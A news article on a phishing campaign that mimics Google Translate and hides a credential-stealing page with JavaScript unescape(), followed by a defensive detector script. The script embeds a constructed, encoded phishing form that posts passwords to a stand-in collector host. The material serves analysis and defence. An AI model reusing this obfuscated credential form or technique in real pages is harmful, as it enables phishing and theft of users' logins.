Threat analysts at Avanan, a Check Point Software firm, have unearthed a novel phishing campaign mimicking Google Translate in order to lure users.
The hackers use this coding technique to obfuscate the phishing pages so that they look authentic to the victim and slip past security gateways. They also use social engineering to convince users that they must respond to an email immediately or permanently lose access to unread messages.
The victims are then asked to click on a link embedded in the email. Clicking the link takes them to a credential-stealing page designed to look like a genuine Google Translate page, with the email field already filled in so that the victim need only enter their login credentials.
According to a blog post published last week, this is the standard modus operandi of such hackers: it creates a sense of urgency and pushes victims to act rashly by clicking a malicious link or downloading a malicious attachment. Behind the scenes, the hackers also rely heavily on JavaScript, including the unescape() function, to hide their true intentions.
unescape() is a JavaScript function that takes a single string as its parameter and returns a new string, decoding text that was encoded with the escape() function. Each hexadecimal escape sequence in the input is replaced by the character it represents when the string is decoded with unescape().
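The decoding described above is what a browser performs silently; a defender inspecting page source can perform it explicitly and then look at what the hidden markup actually does. The following is an added example (not code from the Avanan report) that reimplements the unescape() transformation, pulls every unescape()-wrapped literal out of a constructed sample page, and flags password forms whose submit target resolves to a host other than the one the page impersonates; the sample page and the placeholder host example.invalid are constructed for the demonstration.

```javascript
// Added example, not from the Avanan report: decode unescape()-wrapped markup
// the way the browser would, then flag any credential form it hides whose
// submit target is not the site the page claims to be. The page below is a
// constructed sample; "example.invalid" is a placeholder collector host.
const CONSTRUCTED_PAGE = '<html><body><h1>Google Translate</h1><script>' +
  "document.write(unescape('%3Cform%20action%3D%22https%3A%2F%2Fexample.invalid" +
  "%2Fcollect%22%3E%3Cinput%20type%3D%22password%22%20name%3D%22pw%22%3E%3C%2Fform%3E'))" +
  '</script></body></html>';

// Same transformation unescape() applies: %XX and %uXXXX hex sequences become
// the characters they encode; everything else passes through unchanged.
function decodeEscaped(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u ?? h, 16)));
}

// Pull every string literal handed to unescape() out of the raw page source
// and decode it, so the hidden markup can be inspected like ordinary HTML.
function extractUnescapePayloads(html) {
  const re = /unescape\(\s*(['"])([^'"]*)\1\s*\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(html)) !== null) decoded.push(decodeEscaped(m[2]));
  return decoded;
}

// Report each form that asks for a password together with the host it posts to.
// A password form whose action resolves off the expected host is the tell.
function findCredentialForms(markup, expectedHost) {
  const formRe = /<form\b[^>]*\baction\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/form>/gi;
  const findings = [];
  let m;
  while ((m = formRe.exec(markup)) !== null) {
    const [, action, body] = m;
    const asksPassword = /<input\b[^>]*\btype\s*=\s*["']password["']/i.test(body);
    let host;
    try { host = new URL(action, `https://${expectedHost}/`).hostname; }
    catch { host = '(unparseable)'; }
    findings.push({ action, host, asksPassword,
                    suspicious: asksPassword && host !== expectedHost });
  }
  return findings;
}

// Decode every hidden fragment and check the forms it contains.
function analyzePage(html, expectedHost) {
  return extractUnescapePayloads(html)
    .flatMap(markup => findCredentialForms(markup, expectedHost));
}

console.log(analyzePage(CONSTRUCTED_PAGE, 'translate.google.com'));
```

Running it on the sample prints one finding whose form posts to example.invalid rather than translate.google.com, which is exactly the detail the obfuscation was meant to keep out of sight.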
“This attack has a little bit of everything. It has unique social engineering at the front end. It leverages a legitimate site to help get into the inbox. It uses trickery and obfuscation to confuse security services,” Jeremy Fuchs, an Avanan cybersecurity threat analyst stated.
To guard against these attacks, users need to be extra vigilant. The researchers recommended users scan the URLs found in messages before clicking on them to ensure the destination is legitimate.
Moreover, users can check the authenticity of an email by paying closer attention to grammar, spelling, and factual inconsistencies in its text. If users are unsure where an email came from or what it is asking them to do, they should confirm with the purported sender before taking further action.